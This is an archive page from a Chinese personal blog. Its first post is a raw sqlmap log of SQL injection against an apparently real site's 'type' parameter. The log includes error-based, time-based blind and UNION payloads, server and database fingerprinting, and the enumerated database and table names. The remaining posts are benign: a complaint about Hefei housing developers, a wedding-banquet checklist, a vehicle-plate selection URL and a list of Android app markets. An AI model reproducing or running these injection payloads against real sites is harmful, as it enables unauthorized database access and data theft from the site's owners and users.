存档

2016年5月 的存档

一种mysql注入方式

2016年5月31日 没有评论

某网址地址是:view.php?id=177&type=zxxw

注入如下:

ected
GET parameter ‘type’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 5474 HTTP(s) requests:

Parameter: type (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=177&type=zxxw’ AND (SELECT 5429 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(5429=5429,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)– TqJA

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=177&type=zxxw’ AND (SELECT * FROM (SELECT(SLEEP(5)))wqUP)– jRzd

Type: UNION query
Title: Generic UNION query (NULL) – 2 columns
Payload: id=177&type=-9914′ UNION ALL SELECT CONCAT(0x7170787671,0x54726c526a56484f564e75526a5459584a4a4f4e71474753627055557842696d4676494850484958,0x717a6b7a71),NULL– zfmK

[15:41:32] [INFO] testing MySQL
[15:41:32] [INFO] confirming MySQL
[15:41:33] [INFO] the back-end DBMS is MySQL
[15:41:33] [INFO] actively fingerprinting MySQL
[15:41:33] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
html error message fingerprint: MySQL
[15:41:40] [INFO] fetching database names
[15:41:40] [INFO] the SQL query used returns 2 entries
[15:41:40] [INFO] retrieved: information_schema
[15:41:40] [INFO] retrieved: c211structure
available databases [2]:
[*] c211structure
[*] information_schema

Database: c211structure
[9 tables]
+————+
| ads        |
| banner     |
| cases      |
| dpedithome |
| dpnews     |
| dpnewsEn   |
| edithome   |
| flink      |
| news       |
+————+

分类: mysql优化 标签: , ,

合肥楼市乱象丛生记

2016年5月25日 没有评论

合肥北二环一楼盘,名叫融侨悦城,他们眼里没有政府,他们代替政府说话?本人于2月前认筹融侨悦城楼盘,交付认筹费3万元整,前几天接到售楼处电话,称必须购买25万车位方能“优先”购房,本人通过再三交涉,对方称“没事,我们上面有人,你举报吧”,结果我经过了“房产局让找工商局,工商局让找物价局,物价局让找土地管理局,土地管理局让找市场监督管理局,市场监督管理局让找建筑监督管理局,建筑监督管理局让找某分局,某分局让找工商局”层层举报无果!合肥市政府4月出台的相关政策乃“口出狂言”,面对政府和开发商的层层“关系”,作为一个普通合肥市民,我是“平静中失望”,甚至可以“理解”。23日该楼盘已暗地开盘,我们这些没买车位的,连通知去参与“摇号”的机会都被“剥夺”。该楼盘违规:(1)捂盘,此次开盘为2#,6户,但开发商只开盘3户(2#半边),不符合“自取得预售证10日内一次性对外销售”。(2)绑定车位。(3)在未进行任何通知的情况下,之前缴纳的3万元认筹款不抵房款,只是“好处费”!面对如此乱象,政府视而不见听而不闻,如果能给政府打分,我希望是负10分,因为政府欠百姓10分。此开发商眼里“无政府”。

1,虽然政府已经出台文件,但开发商背地捂盘依然存在,政府无人巡视,无人监督,无人排查;
2,楼市较年初(短至4个月时间),楼市疯狂上涨30%,甚至某些楼盘涨价50%;政府只口头“安慰”;
3,楼盘实际销售价格远比备案价格高,请废除商品房备案系统!要政府备案何用?
4,明知楼市疯狂上涨,当届政府是否引以为豪?有条件的观望,没条件的不买,坑的是刚需!!!
5,房产商捆绑装修房、装修包、车位、否则无房可卖!虽然政府出台政策,但真的解决了吗?请问谁监管了?谁去查了?
6,当届的市领导,请放下手中的茶杯,为百信谋福,房价已疯狂,楼市会灭亡!
7,谈什么二胎?楼市如此疯涨,以后合肥人都做丁克!以后将是3代人共同还房贷!
8,媒体屡次发表类似“房价上涨预测”哄抬价格
9,二手房中介哄抬价格
10,高认筹费,某些楼盘虽然避规了政府的政策(预售证10天内销售,不捆绑销售等),但是开发商又出了新点子(某楼盘认筹费高达10万)!政府无人监督!
11,关系订房,暗地卖号,某些开发商自己充当黄牛,暗地联系买房者,自称关系户,在合肥无房可卖的环境下,包你能买到(需缴纳信息费,高达3万一方,乃至更高!)

自制预定婚宴酒店表格

2016年5月22日 没有评论

酒店名称    电话    地址

销售/手机    进场费(婚庆合作)

套餐    酒水、套餐内容

付款方式    可约时间

LED、话筒、音响、桌布颜色,负责摆台、涨价等

安徽省合肥市机动车网上选号、预选网址

2016年5月11日 没有评论

找了很久没有找到合肥市的机动车网上选号网址(准确来说应该是预选网址?)

入口:http://ah.122.gov.cn/

登录后跳转至:http://ah.122.gov.cn/veh1/netxh

应该就可以了,我没试,记录用,以后说不定能用到。

国内常用android安卓应用市场列表

2016年5月9日 没有评论

com.tencent.android.qqdownloader    应用宝
com.wandoujia.phoenix2 豌豆荚
com.hiapk.marketpho 安卓市场
cn.goapk.market 安智市场
com.sogou.androidtool 搜狗手机助手
com.qihoo.appstore  360手机助手

91
搜狗市场
机锋市场
爱米软件商店
优亿市场
掌上应用汇
开奇商店
N多市场
安卓星空
巴士商店
XDA市场
安丰下载
历趣安卓市场
联想应用
欧米
网易应用
moto智件园

分类: android 标签: , , , ,
css.php